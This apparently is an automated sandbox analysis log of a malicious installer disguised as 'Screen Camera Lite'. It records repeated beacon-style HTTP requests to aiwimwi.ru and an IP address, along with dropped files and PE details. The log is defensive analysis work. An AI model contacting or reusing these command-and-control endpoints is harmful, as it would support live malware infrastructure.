        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: aiwimwi.ru
        Source: screencameralite32_64.exe, 00000002.00000002.2966103090.00000000037A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee948
        Source: screencameralite32_64.exe, 00000002.00000002.2964942696.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.208.158.248/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
        Source: AyiNxJ98mL.exe, 00000000.00000002.2964604196.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.exe, 00000000.00000003.1712213221.0000000002480000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1714448778.0000000002130000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964889635.000000000211C000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1714366626.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964601742.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1716748546.00000000005EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fsf.org/
        Source: is-LI4GH.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: is-OOQC3.tmp.1.drString found in binary or memory: http://tukaani.org/
        Source: is-OOQC3.tmp.1.drString found in binary or memory: http://tukaani.org/xz/
        Source: AyiNxJ98mL.exe, 00000000.00000002.2964604196.00000000021C8000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.exe, 00000000.00000003.1712213221.0000000002480000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1714448778.0000000002130000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964889635.000000000211C000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1714366626.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964601742.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000003.1716748546.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, is-MLNUS.tmp.1.drString found in binary or memory: http://www.gnu.org/licenses/
        Source: AyiNxJ98mL.tmp, AyiNxJ98mL.tmp, 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AyiNxJ98mL.tmp.0.dr, is-3VPQL.tmp.1.drString found in binary or memory: http://www.innosetup.com/
        Source: AyiNxJ98mL.exe, 00000000.00000003.1712874171.0000000002480000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.exe, 00000000.00000003.1713077693.00000000021D4000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, AyiNxJ98mL.tmp, 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AyiNxJ98mL.tmp.0.dr, is-3VPQL.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
        Source: AyiNxJ98mL.exe, 00000000.00000003.1712874171.0000000002480000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.exe, 00000000.00000003.1713077693.00000000021D4000.00000004.00001000.00020000.00000000.sdmp, AyiNxJ98mL.tmp, 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, AyiNxJ98mL.tmp.0.dr, is-3VPQL.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU

        System Summary

        barindex
        Source: screencameralite32_64.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: Escape Division LIB 10.6.45.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0042F530 NtdllDefWindowProc_A,1_2_0042F530
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004789DC NtdllDefWindowProc_A,1_2_004789DC
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_004573CC
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E944
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555D0
        Source: C:\Users\user\Desktop\AyiNxJ98mL.exeCode function: 0_2_0040840C0_2_0040840C
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004804C61_2_004804C6
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004709501_2_00470950
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004352D81_2_004352D8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004677101_2_00467710
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0043036C1_2_0043036C
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004444D81_2_004444D8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004345D41_2_004345D4
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004866041_2_00486604
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00444A801_2_00444A80
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_00430EF81_2_00430EF8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004451781_2_00445178
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0045F4301_2_0045F430
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0045B4D81_2_0045B4D8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004875641_2_00487564
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004455841_2_00445584
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004697701_2_00469770
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0048D8C41_2_0048D8C4
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_004519A81_2_004519A8
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_0043DD601_2_0043DD60
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_030E1EE01_2_030E1EE0
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_030E11401_2_030E1140
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: 1_2_030E16B01_2_030E16B0
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_00406C472_2_00406C47
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_004010512_2_00401051
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_00401C262_2_00401C26
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02CABCEB2_2_02CABCEB
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02CAB4E52_2_02CAB4E5
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02CABD582_2_02CABD58
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C8E18D2_2_02C8E18D
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C89E842_2_02C89E84
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C94E292_2_02C94E29
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C7EFAD2_2_02C7EFAD
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C8DC992_2_02C8DC99
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C884422_2_02C88442
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C8AC3A2_2_02C8AC3A
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C8E5A52_2_02C8E5A5
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C92DB42_2_02C92DB4
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Screen Camera Lite\is-1EDIU.tmp 0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00405964 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00408C14 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00406ACC appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00403400 appears 61 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00445DE4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 004078FC appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 004344EC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00403494 appears 82 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00457D58 appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00453330 appears 93 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00457B4C appears 98 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 00403684 appears 221 times
        Source: C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmpCode function: String function: 004460B4 appears 59 times
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: String function: 02C88AE0 appears 37 times
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: String function: 02C95330 appears 138 times
        Source: AyiNxJ98mL.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: AyiNxJ98mL.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: AyiNxJ98mL.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
